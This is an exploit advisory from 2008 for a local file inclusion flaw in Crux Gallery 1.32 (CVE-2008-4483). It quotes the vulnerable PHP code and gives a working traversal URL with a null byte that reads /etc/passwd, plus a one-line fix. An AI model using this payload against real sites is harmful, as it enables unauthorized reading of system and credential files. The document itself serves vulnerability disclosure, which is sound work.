Crux Gallery 1.32 - 'theme' Local File Inclusion

Related Vulnerabilities: CVE-2008-4483  
Publish Date: 01 Oct 2008
Author: StAkeR
  [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
  [?] Discovered On: 01/10/2008
  [*] PHP.ini 
  [*] Magic_Quotes_Gpc = Off
  (index.php) // Greetz -> Osirys and darkjoker
  14. $m = $_GET['m'];
  15. $p = $_GET['p'];
  16. $dir = $_GET['dir'];
  17. require_once("main.php");
  18. require_once("themes/".$theme."/theme.php"); 
  $theme  isn't declared, so you can include any file.
  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
  [*] How To Fix: declare $theme

# [2008-10-01]